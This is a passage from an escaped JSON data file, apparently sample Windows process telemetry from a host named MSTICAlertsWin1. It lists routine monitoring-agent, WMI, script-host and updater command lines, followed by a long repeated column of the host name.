/nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"taskhostw.exe SYSTEM\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\"],\"Computer\":[\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"M